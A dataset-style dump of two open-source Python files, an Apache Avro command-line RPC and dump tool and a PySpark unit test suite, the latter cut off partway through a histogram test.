source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
tool.py
|
#!/usr/bin/env python3
##
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Command-line tool
NOTE: The API for the command-line tool is experimental.
"""
import argparse
import http.server
import os.path
import sys
import threading
import urllib.parse
import warnings
from pathlib import Path
import avro.datafile
import avro.io
import avro.ipc
import avro.protocol
server_should_shutdown = False
responder: "GenericResponder"
class GenericResponder(avro.ipc.Responder):
def __init__(self, proto, msg, datum) -> None:
avro.ipc.Responder.__init__(self, avro.protocol.parse(Path(proto).read_text()))
self.msg = msg
self.datum = datum
def invoke(self, message, request) -> object:
global server_should_shutdown
if message.name != self.msg:
return None
print(f"Message: {message.name} Datum: {self.datum}", file=sys.stderr)
# server will shut down after processing a single Avro request
server_should_shutdown = True
return self.datum
class GenericHandler(http.server.BaseHTTPRequestHandler):
def do_POST(self) -> None:
self.responder = responder
call_request_reader = avro.ipc.FramedReader(self.rfile)
call_request = call_request_reader.read_framed_message()
resp_body = self.responder.respond(call_request)
self.send_response(200)
self.send_header("Content-Type", "avro/binary")
self.end_headers()
resp_writer = avro.ipc.FramedWriter(self.wfile)
resp_writer.write_framed_message(resp_body)
if server_should_shutdown:
print("Shutting down server.", file=sys.stderr)
quitter = threading.Thread(target=self.server.shutdown)
quitter.daemon = True
quitter.start()
def run_server(uri: str, proto: str, msg: str, datum: object) -> None:
global responder
global server_should_shutdown
url_obj = urllib.parse.urlparse(uri)
if url_obj.hostname is None:
raise RuntimeError(f"uri {uri} must have a hostname.")
if url_obj.port is None:
raise RuntimeError(f"uri {uri} must have a port.")
server_addr = (url_obj.hostname, url_obj.port)
server_should_shutdown = False
responder = GenericResponder(proto, msg, datum)
server = http.server.HTTPServer(server_addr, GenericHandler)
print(f"Port: {server.server_port}")
sys.stdout.flush()
server.allow_reuse_address = True
print("Starting server.", file=sys.stderr)
server.serve_forever()
def send_message(uri, proto, msg, datum) -> None:
url_obj = urllib.parse.urlparse(uri)
client = avro.ipc.HTTPTransceiver(url_obj.hostname, url_obj.port)
requestor = avro.ipc.Requestor(avro.protocol.parse(Path(proto).read_text()), client)
print(requestor.request(msg, datum))
def _parse_args() -> argparse.Namespace:
"""Parse the command-line arguments"""
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers(required=True, dest="command") if sys.version_info >= (3, 7) else parser.add_subparsers(dest="command")
subparser_dump = subparsers.add_parser("dump", help="Dump an avro file")
subparser_dump.add_argument("input_file", type=argparse.FileType("rb"))
subparser_rpcreceive = subparsers.add_parser("rpcreceive", help="receive a message")
subparser_rpcreceive.add_argument("uri")
subparser_rpcreceive.add_argument("proto")
subparser_rpcreceive.add_argument("msg")
subparser_rpcreceive.add_argument("-file", type=argparse.FileType("rb"), required=False)
subparser_rpcsend = subparsers.add_parser("rpcsend", help="send a message")
subparser_rpcsend.add_argument("uri")
subparser_rpcsend.add_argument("proto")
subparser_rpcsend.add_argument("msg")
subparser_rpcsend.add_argument("-file", type=argparse.FileType("rb"))
return parser.parse_args()
def main_dump(args: argparse.Namespace) -> int:
print("\n".join(f"{d!r}" for d in avro.datafile.DataFileReader(args.input_file, avro.io.DatumReader())))
return 0
def main_rpcreceive(args: argparse.Namespace) -> int:
datum = None
if args.file:
with avro.datafile.DataFileReader(args.file, avro.io.DatumReader()) as dfr:
datum = next(dfr)
run_server(args.uri, args.proto, args.msg, datum)
return 0
def main_rpcsend(args: argparse.Namespace) -> int:
datum = None
if args.file:
with avro.datafile.DataFileReader(args.file, avro.io.DatumReader()) as dfr:
datum = next(dfr)
send_message(args.uri, args.proto, args.msg, datum)
return 0
def main() -> int:
args = _parse_args()
if args.command == "dump":
return main_dump(args)
if args.command == "rpcreceive":
return main_rpcreceive(args)
if args.command == "rpcsend":
return main_rpcsend(args)
return 1
if __name__ == "__main__":
if os.path.dirname(avro.io.__file__) in sys.path:
warnings.warn(
"Invoking avro/tool.py directly is likely to lead to a name collision "
"with the python io module. Try doing `python -m avro.tool` instead."
)
sys.exit(main())
|
tests.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Unit tests for PySpark; additional tests are implemented as doctests in
individual modules.
"""
from array import array
from glob import glob
import os
import re
import shutil
import subprocess
import sys
import tempfile
import time
import zipfile
import random
import threading
import hashlib
from py4j.protocol import Py4JJavaError
try:
import xmlrunner
except ImportError:
xmlrunner = None
if sys.version_info[:2] <= (2, 6):
try:
import unittest2 as unittest
except ImportError:
sys.stderr.write('Please install unittest2 to test with Python 2.6 or earlier')
sys.exit(1)
else:
import unittest
if sys.version_info[0] >= 3:
xrange = range
basestring = str
if sys.version >= "3":
from io import StringIO
else:
from StringIO import StringIO
from pyspark.conf import SparkConf
from pyspark.context import SparkContext
from pyspark.rdd import RDD
from pyspark.files import SparkFiles
from pyspark.serializers import read_int, BatchedSerializer, MarshalSerializer, PickleSerializer, \
CloudPickleSerializer, CompressedSerializer, UTF8Deserializer, NoOpSerializer, \
PairDeserializer, CartesianDeserializer, AutoBatchedSerializer, AutoSerializer, \
FlattenedValuesSerializer
from pyspark.shuffle import Aggregator, ExternalMerger, ExternalSorter
from pyspark import shuffle
from pyspark.profiler import BasicProfiler
_have_scipy = False
_have_numpy = False
try:
import scipy.sparse
_have_scipy = True
except:
# No SciPy, but that's okay, we'll skip those tests
pass
try:
import numpy as np
_have_numpy = True
except:
# No NumPy, but that's okay, we'll skip those tests
pass
SPARK_HOME = os.environ["SPARK_HOME"]
class MergerTests(unittest.TestCase):
def setUp(self):
self.N = 1 << 12
self.l = [i for i in xrange(self.N)]
self.data = list(zip(self.l, self.l))
self.agg = Aggregator(lambda x: [x],
lambda x, y: x.append(y) or x,
lambda x, y: x.extend(y) or x)
def test_small_dataset(self):
m = ExternalMerger(self.agg, 1000)
m.mergeValues(self.data)
self.assertEqual(m.spills, 0)
self.assertEqual(sum(sum(v) for k, v in m.items()),
sum(xrange(self.N)))
m = ExternalMerger(self.agg, 1000)
m.mergeCombiners(map(lambda x_y1: (x_y1[0], [x_y1[1]]), self.data))
self.assertEqual(m.spills, 0)
self.assertEqual(sum(sum(v) for k, v in m.items()),
sum(xrange(self.N)))
def test_medium_dataset(self):
m = ExternalMerger(self.agg, 20)
m.mergeValues(self.data)
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(sum(v) for k, v in m.items()),
sum(xrange(self.N)))
m = ExternalMerger(self.agg, 10)
m.mergeCombiners(map(lambda x_y2: (x_y2[0], [x_y2[1]]), self.data * 3))
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(sum(v) for k, v in m.items()),
sum(xrange(self.N)) * 3)
def test_huge_dataset(self):
m = ExternalMerger(self.agg, 5, partitions=3)
m.mergeCombiners(map(lambda k_v: (k_v[0], [str(k_v[1])]), self.data * 10))
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(len(v) for k, v in m.items()),
self.N * 10)
m._cleanup()
def test_group_by_key(self):
def gen_data(N, step):
for i in range(1, N + 1, step):
for j in range(i):
yield (i, [j])
def gen_gs(N, step=1):
return shuffle.GroupByKey(gen_data(N, step))
self.assertEqual(1, len(list(gen_gs(1))))
self.assertEqual(2, len(list(gen_gs(2))))
self.assertEqual(100, len(list(gen_gs(100))))
self.assertEqual(list(range(1, 101)), [k for k, _ in gen_gs(100)])
self.assertTrue(all(list(range(k)) == list(vs) for k, vs in gen_gs(100)))
for k, vs in gen_gs(50002, 10000):
self.assertEqual(k, len(vs))
self.assertEqual(list(range(k)), list(vs))
ser = PickleSerializer()
l = ser.loads(ser.dumps(list(gen_gs(50002, 30000))))
for k, vs in l:
self.assertEqual(k, len(vs))
self.assertEqual(list(range(k)), list(vs))
class SorterTests(unittest.TestCase):
def test_in_memory_sort(self):
l = list(range(1024))
random.shuffle(l)
sorter = ExternalSorter(1024)
self.assertEqual(sorted(l), list(sorter.sorted(l)))
self.assertEqual(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True)))
self.assertEqual(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x)))
self.assertEqual(sorted(l, key=lambda x: -x, reverse=True),
list(sorter.sorted(l, key=lambda x: -x, reverse=True)))
def test_external_sort(self):
class CustomizedSorter(ExternalSorter):
def _next_limit(self):
return self.memory_limit
l = list(range(1024))
random.shuffle(l)
sorter = CustomizedSorter(1)
self.assertEqual(sorted(l), list(sorter.sorted(l)))
self.assertGreater(shuffle.DiskBytesSpilled, 0)
last = shuffle.DiskBytesSpilled
self.assertEqual(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
last = shuffle.DiskBytesSpilled
self.assertEqual(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
last = shuffle.DiskBytesSpilled
self.assertEqual(sorted(l, key=lambda x: -x, reverse=True),
list(sorter.sorted(l, key=lambda x: -x, reverse=True)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
def test_external_sort_in_rdd(self):
conf = SparkConf().set("spark.python.worker.memory", "1m")
sc = SparkContext(conf=conf)
l = list(range(10240))
random.shuffle(l)
rdd = sc.parallelize(l, 4)
self.assertEqual(sorted(l), rdd.sortBy(lambda x: x).collect())
sc.stop()
class SerializationTestCase(unittest.TestCase):
def test_namedtuple(self):
from collections import namedtuple
from pickle import dumps, loads
P = namedtuple("P", "x y")
p1 = P(1, 3)
p2 = loads(dumps(p1, 2))
self.assertEqual(p1, p2)
from pyspark.cloudpickle import dumps
P2 = loads(dumps(P))
p3 = P2(1, 3)
self.assertEqual(p1, p3)
def test_itemgetter(self):
from operator import itemgetter
ser = CloudPickleSerializer()
d = range(10)
getter = itemgetter(1)
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = itemgetter(0, 3)
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
def test_function_module_name(self):
ser = CloudPickleSerializer()
func = lambda x: x
func2 = ser.loads(ser.dumps(func))
self.assertEqual(func.__module__, func2.__module__)
def test_attrgetter(self):
from operator import attrgetter
ser = CloudPickleSerializer()
class C(object):
def __getattr__(self, item):
return item
d = C()
getter = attrgetter("a")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = attrgetter("a", "b")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
d.e = C()
getter = attrgetter("e.a")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = attrgetter("e.a", "e.b")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
# Regression test for SPARK-3415
def test_pickling_file_handles(self):
# to be corrected with SPARK-11160
if not xmlrunner:
ser = CloudPickleSerializer()
out1 = sys.stderr
out2 = ser.loads(ser.dumps(out1))
self.assertEqual(out1, out2)
def test_func_globals(self):
class Unpicklable(object):
def __reduce__(self):
raise Exception("not picklable")
global exit
exit = Unpicklable()
ser = CloudPickleSerializer()
self.assertRaises(Exception, lambda: ser.dumps(exit))
def foo():
sys.exit(0)
self.assertTrue("exit" in foo.__code__.co_names)
ser.dumps(foo)
def test_compressed_serializer(self):
ser = CompressedSerializer(PickleSerializer())
try:
from StringIO import StringIO
except ImportError:
from io import BytesIO as StringIO
io = StringIO()
ser.dump_stream(["abc", u"123", range(5)], io)
io.seek(0)
self.assertEqual(["abc", u"123", range(5)], list(ser.load_stream(io)))
ser.dump_stream(range(1000), io)
io.seek(0)
self.assertEqual(["abc", u"123", range(5)] + list(range(1000)), list(ser.load_stream(io)))
io.close()
def test_hash_serializer(self):
hash(NoOpSerializer())
hash(UTF8Deserializer())
hash(PickleSerializer())
hash(MarshalSerializer())
hash(AutoSerializer())
hash(BatchedSerializer(PickleSerializer()))
hash(AutoBatchedSerializer(MarshalSerializer()))
hash(PairDeserializer(NoOpSerializer(), UTF8Deserializer()))
hash(CartesianDeserializer(NoOpSerializer(), UTF8Deserializer()))
hash(CompressedSerializer(PickleSerializer()))
hash(FlattenedValuesSerializer(PickleSerializer()))
class QuietTest(object):
def __init__(self, sc):
self.log4j = sc._jvm.org.apache.log4j
def __enter__(self):
self.old_level = self.log4j.LogManager.getRootLogger().getLevel()
self.log4j.LogManager.getRootLogger().setLevel(self.log4j.Level.FATAL)
def __exit__(self, exc_type, exc_val, exc_tb):
self.log4j.LogManager.getRootLogger().setLevel(self.old_level)
class PySparkTestCase(unittest.TestCase):
def setUp(self):
self._old_sys_path = list(sys.path)
class_name = self.__class__.__name__
self.sc = SparkContext('local[4]', class_name)
def tearDown(self):
self.sc.stop()
sys.path = self._old_sys_path
class ReusedPySparkTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.sc = SparkContext('local[4]', cls.__name__)
@classmethod
def tearDownClass(cls):
cls.sc.stop()
class CheckpointTests(ReusedPySparkTestCase):
def setUp(self):
self.checkpointDir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.checkpointDir.name)
self.sc.setCheckpointDir(self.checkpointDir.name)
def tearDown(self):
shutil.rmtree(self.checkpointDir.name)
def test_basic_checkpointing(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: range(1, x + 1))
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
result = flatMappedRDD.collect()
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.isCheckpointed())
self.assertEqual(flatMappedRDD.collect(), result)
self.assertEqual("file:" + self.checkpointDir.name,
os.path.dirname(os.path.dirname(flatMappedRDD.getCheckpointFile())))
def test_checkpoint_and_restore(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: [x])
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
flatMappedRDD.count() # forces a checkpoint to be computed
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.getCheckpointFile() is not None)
recovered = self.sc._checkpointFile(flatMappedRDD.getCheckpointFile(),
flatMappedRDD._jrdd_deserializer)
self.assertEqual([1, 2, 3, 4], recovered.collect())
class AddFileTests(PySparkTestCase):
def test_add_py_file(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this job fails due to `userlibrary` not being on the Python path:
# disable logging in log4j temporarily
def func(x):
from userlibrary import UserClass
return UserClass().hello()
with QuietTest(self.sc):
self.assertRaises(Exception, self.sc.parallelize(range(2)).map(func).first)
# Add the file, so the job should now succeed:
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addPyFile(path)
res = self.sc.parallelize(range(2)).map(func).first()
self.assertEqual("Hello World!", res)
def test_add_file_locally(self):
path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
self.sc.addFile(path)
download_path = SparkFiles.get("hello.txt")
self.assertNotEqual(path, download_path)
with open(download_path) as test_file:
self.assertEqual("Hello World!\n", test_file.readline())
def test_add_py_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlibrary import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addPyFile(path)
from userlibrary import UserClass
self.assertEqual("Hello World!", UserClass().hello())
def test_add_egg_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlib import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlib-0.1.zip")
self.sc.addPyFile(path)
from userlib import UserClass
self.assertEqual("Hello World from inside a package!", UserClass().hello())
def test_overwrite_system_module(self):
self.sc.addPyFile(os.path.join(SPARK_HOME, "python/test_support/SimpleHTTPServer.py"))
import SimpleHTTPServer
self.assertEqual("My Server", SimpleHTTPServer.__name__)
def func(x):
import SimpleHTTPServer
return SimpleHTTPServer.__name__
self.assertEqual(["My Server"], self.sc.parallelize(range(1)).map(func).collect())
class RDDTests(ReusedPySparkTestCase):
def test_range(self):
self.assertEqual(self.sc.range(1, 1).count(), 0)
self.assertEqual(self.sc.range(1, 0, -1).count(), 1)
self.assertEqual(self.sc.range(0, 1 << 40, 1 << 39).count(), 2)
def test_id(self):
rdd = self.sc.parallelize(range(10))
id = rdd.id()
self.assertEqual(id, rdd.id())
rdd2 = rdd.map(str).filter(bool)
id2 = rdd2.id()
self.assertEqual(id + 1, id2)
self.assertEqual(id2, rdd2.id())
def test_empty_rdd(self):
rdd = self.sc.emptyRDD()
self.assertTrue(rdd.isEmpty())
def test_sum(self):
self.assertEqual(0, self.sc.emptyRDD().sum())
self.assertEqual(6, self.sc.parallelize([1, 2, 3]).sum())
def test_save_as_textfile_with_unicode(self):
# Regression test for SPARK-970
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = b''.join(open(p, 'rb').read()
for p in glob(tempFile.name + "/part-0000*"))
self.assertEqual(x, raw_contents.strip().decode("utf-8"))
def test_save_as_textfile_with_utf8(self):
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x.encode("utf-8")])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = b''.join(open(p, 'rb').read()
for p in glob(tempFile.name + "/part-0000*"))
self.assertEqual(x, raw_contents.strip().decode('utf8'))
def test_transforming_cartesian_result(self):
# Regression test for SPARK-1034
rdd1 = self.sc.parallelize([1, 2])
rdd2 = self.sc.parallelize([3, 4])
cart = rdd1.cartesian(rdd2)
result = cart.map(lambda x_y3: x_y3[0] + x_y3[1]).collect()
def test_transforming_pickle_file(self):
# Regression test for SPARK-2601
data = self.sc.parallelize([u"Hello", u"World!"])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsPickleFile(tempFile.name)
pickled_file = self.sc.pickleFile(tempFile.name)
pickled_file.map(lambda x: x).collect()
def test_cartesian_on_textfile(self):
# Regression test for
path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
a = self.sc.textFile(path)
result = a.cartesian(a).collect()
(x, y) = result[0]
self.assertEqual(u"Hello World!", x.strip())
self.assertEqual(u"Hello World!", y.strip())
def test_deleting_input_files(self):
# Regression test for SPARK-1025
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write(b"Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: filtered_data.count())
def test_sampling_default_seed(self):
# Test for SPARK-3995 (default seed setting)
data = self.sc.parallelize(xrange(1000), 1)
subset = data.takeSample(False, 10)
self.assertEqual(len(subset), 10)
def test_aggregate_mutable_zero_value(self):
# Test for SPARK-9021; uses aggregate and treeAggregate to build dict
# representing a counter of ints
# NOTE: dict is used instead of collections.Counter for Python 2.6
# compatibility
from collections import defaultdict
# Show that single or multiple partitions work
data1 = self.sc.range(10, numSlices=1)
data2 = self.sc.range(10, numSlices=2)
def seqOp(x, y):
x[y] += 1
return x
def comboOp(x, y):
for key, val in y.items():
x[key] += val
return x
counts1 = data1.aggregate(defaultdict(int), seqOp, comboOp)
counts2 = data2.aggregate(defaultdict(int), seqOp, comboOp)
counts3 = data1.treeAggregate(defaultdict(int), seqOp, comboOp, 2)
counts4 = data2.treeAggregate(defaultdict(int), seqOp, comboOp, 2)
ground_truth = defaultdict(int, dict((i, 1) for i in range(10)))
self.assertEqual(counts1, ground_truth)
self.assertEqual(counts2, ground_truth)
self.assertEqual(counts3, ground_truth)
self.assertEqual(counts4, ground_truth)
def test_aggregate_by_key_mutable_zero_value(self):
# Test for SPARK-9021; uses aggregateByKey to make a pair RDD that
# contains lists of all values for each key in the original RDD
# list(range(...)) for Python 3.x compatibility (can't use * operator
# on a range object)
# list(zip(...)) for Python 3.x compatibility (want to parallelize a
# collection, not a zip object)
tuples = list(zip(list(range(10))*2, [1]*20))
# Show that single or multiple partitions work
data1 = self.sc.parallelize(tuples, 1)
data2 = self.sc.parallelize(tuples, 2)
def seqOp(x, y):
x.append(y)
return x
def comboOp(x, y):
x.extend(y)
return x
values1 = data1.aggregateByKey([], seqOp, comboOp).collect()
values2 = data2.aggregateByKey([], seqOp, comboOp).collect()
# Sort lists to ensure clean comparison with ground_truth
values1.sort()
values2.sort()
ground_truth = [(i, [1]*2) for i in range(10)]
self.assertEqual(values1, ground_truth)
self.assertEqual(values2, ground_truth)
def test_fold_mutable_zero_value(self):
# Test for SPARK-9021; uses fold to merge an RDD of dict counters into
# a single dict
# NOTE: dict is used instead of collections.Counter for Python 2.6
# compatibility
from collections import defaultdict
counts1 = defaultdict(int, dict((i, 1) for i in range(10)))
counts2 = defaultdict(int, dict((i, 1) for i in range(3, 8)))
counts3 = defaultdict(int, dict((i, 1) for i in range(4, 7)))
counts4 = defaultdict(int, dict((i, 1) for i in range(5, 6)))
all_counts = [counts1, counts2, counts3, counts4]
# Show that single or multiple partitions work
data1 = self.sc.parallelize(all_counts, 1)
data2 = self.sc.parallelize(all_counts, 2)
def comboOp(x, y):
for key, val in y.items():
x[key] += val
return x
fold1 = data1.fold(defaultdict(int), comboOp)
fold2 = data2.fold(defaultdict(int), comboOp)
ground_truth = defaultdict(int)
for counts in all_counts:
for key, val in counts.items():
ground_truth[key] += val
self.assertEqual(fold1, ground_truth)
self.assertEqual(fold2, ground_truth)
def test_fold_by_key_mutable_zero_value(self):
# Test for SPARK-9021; uses foldByKey to make a pair RDD that contains
# lists of all values for each key in the original RDD
tuples = [(i, range(i)) for i in range(10)]*2
# Show that single or multiple partitions work
data1 = self.sc.parallelize(tuples, 1)
data2 = self.sc.parallelize(tuples, 2)
def comboOp(x, y):
x.extend(y)
return x
values1 = data1.foldByKey([], comboOp).collect()
values2 = data2.foldByKey([], comboOp).collect()
# Sort lists to ensure clean comparison with ground_truth
values1.sort()
values2.sort()
# list(range(...)) for Python 3.x compatibility
ground_truth = [(i, list(range(i))*2) for i in range(10)]
self.assertEqual(values1, ground_truth)
self.assertEqual(values2, ground_truth)
def test_aggregate_by_key(self):
data = self.sc.parallelize([(1, 1), (1, 1), (3, 2), (5, 1), (5, 3)], 2)
def seqOp(x, y):
x.add(y)
return x
def combOp(x, y):
x |= y
return x
sets = dict(data.aggregateByKey(set(), seqOp, combOp).collect())
self.assertEqual(3, len(sets))
self.assertEqual(set([1]), sets[1])
self.assertEqual(set([2]), sets[3])
self.assertEqual(set([1, 3]), sets[5])
def test_itemgetter(self):
rdd = self.sc.parallelize([range(10)])
from operator import itemgetter
self.assertEqual([1], rdd.map(itemgetter(1)).collect())
self.assertEqual([(2, 3)], rdd.map(itemgetter(2, 3)).collect())
def test_namedtuple_in_rdd(self):
from collections import namedtuple
Person = namedtuple("Person", "id firstName lastName")
jon = Person(1, "Jon", "Doe")
jane = Person(2, "Jane", "Doe")
theDoes = self.sc.parallelize([jon, jane])
self.assertEqual([jon, jane], theDoes.collect())
def test_large_broadcast(self):
N = 10000
data = [[float(i) for i in range(300)] for i in range(N)]
bdata = self.sc.broadcast(data) # 27MB
m = self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
self.assertEqual(N, m)
def test_unpersist(self):
N = 1000
data = [[float(i) for i in range(300)] for i in range(N)]
bdata = self.sc.broadcast(data) # 3MB
bdata.unpersist()
m = self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
self.assertEqual(N, m)
bdata.destroy()
try:
self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
except Exception as e:
pass
else:
raise Exception("job should fail after destroy the broadcast")
def test_multiple_broadcasts(self):
N = 1 << 21
b1 = self.sc.broadcast(set(range(N))) # multiple blocks in JVM
r = list(range(1 << 15))
random.shuffle(r)
s = str(r).encode()
checksum = hashlib.md5(s).hexdigest()
b2 = self.sc.broadcast(s)
r = list(set(self.sc.parallelize(range(10), 10).map(
lambda x: (len(b1.value), hashlib.md5(b2.value).hexdigest())).collect()))
self.assertEqual(1, len(r))
size, csum = r[0]
self.assertEqual(N, size)
self.assertEqual(checksum, csum)
random.shuffle(r)
s = str(r).encode()
checksum = hashlib.md5(s).hexdigest()
b2 = self.sc.broadcast(s)
r = list(set(self.sc.parallelize(range(10), 10).map(
lambda x: (len(b1.value), hashlib.md5(b2.value).hexdigest())).collect()))
self.assertEqual(1, len(r))
size, csum = r[0]
self.assertEqual(N, size)
self.assertEqual(checksum, csum)
def test_large_closure(self):
N = 200000
data = [float(i) for i in xrange(N)]
rdd = self.sc.parallelize(range(1), 1).map(lambda x: len(data))
self.assertEqual(N, rdd.first())
# regression test for SPARK-6886
self.assertEqual(1, rdd.map(lambda x: (x, 1)).groupByKey().count())
def test_zip_with_different_serializers(self):
a = self.sc.parallelize(range(5))
b = self.sc.parallelize(range(100, 105))
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
a = a._reserialize(BatchedSerializer(PickleSerializer(), 2))
b = b._reserialize(MarshalSerializer())
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
# regression test for SPARK-4841
path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
t = self.sc.textFile(path)
cnt = t.count()
self.assertEqual(cnt, t.zip(t).count())
rdd = t.map(str)
self.assertEqual(cnt, t.zip(rdd).count())
# regression test for bug in _reserializer()
self.assertEqual(cnt, t.zip(rdd).count())
def test_zip_with_different_object_sizes(self):
# regress test for SPARK-5973
a = self.sc.parallelize(xrange(10000)).map(lambda i: '*' * i)
b = self.sc.parallelize(xrange(10000, 20000)).map(lambda i: '*' * i)
self.assertEqual(10000, a.zip(b).count())
def test_zip_with_different_number_of_items(self):
a = self.sc.parallelize(range(5), 2)
# different number of partitions
b = self.sc.parallelize(range(100, 106), 3)
self.assertRaises(ValueError, lambda: a.zip(b))
with QuietTest(self.sc):
# different number of batched items in JVM
b = self.sc.parallelize(range(100, 104), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# different number of items in one pair
b = self.sc.parallelize(range(100, 106), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# same total number of items, but different distributions
a = self.sc.parallelize([2, 3], 2).flatMap(range)
b = self.sc.parallelize([3, 2], 2).flatMap(range)
self.assertEqual(a.count(), b.count())
self.assertRaises(Exception, lambda: a.zip(b).count())
def test_count_approx_distinct(self):
rdd = self.sc.parallelize(xrange(1000))
self.assertTrue(950 < rdd.countApproxDistinct(0.03) < 1050)
self.assertTrue(950 < rdd.map(float).countApproxDistinct(0.03) < 1050)
self.assertTrue(950 < rdd.map(str).countApproxDistinct(0.03) < 1050)
self.assertTrue(950 < rdd.map(lambda x: (x, -x)).countApproxDistinct(0.03) < 1050)
rdd = self.sc.parallelize([i % 20 for i in range(1000)], 7)
self.assertTrue(18 < rdd.countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(float).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(str).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(lambda x: (x, -x)).countApproxDistinct() < 22)
self.assertRaises(ValueError, lambda: rdd.countApproxDistinct(0.00000001))
def test_histogram(self):
# empty
rdd = self.sc.parallelize([])
self.assertEqual([0], rdd.histogram([0, 10])[1])
self.assertEqual([0, 0], rdd.histogram([0, 4, 10])[1])
self.assertRaises(ValueError, lambda: rdd.histogram(1))
# out of range
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEqual([0], rdd.histogram([0, 10])[1])
self.assertEqual([0, 0], rdd.histogram((0, 4, 10))[1])
# in range with one bucket
rdd = self.sc.parallelize(range(1, 5))
self.assertEqual([4], rdd.histogram([0, 10])[1])
self.assertEqual([3, 1], rdd.histogram([0, 4, 10])[1])
# in range with one bucket exact match
self.assertEqual([4], rdd.histogram([1, 4])[1])
# out of range with two buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEqual([0, 0], rdd.histogram([0, 5, 10])[1])
# out of range with two uneven buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEqual([0, 0], rdd.histogram([0, 4, 10])[1])
# in range with two buckets
rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEqual([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two bucket and None
rdd = self.sc.parallelize([1, 2, 3, 5, 6, None, float('nan')])
self.assertEqual([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two uneven buckets
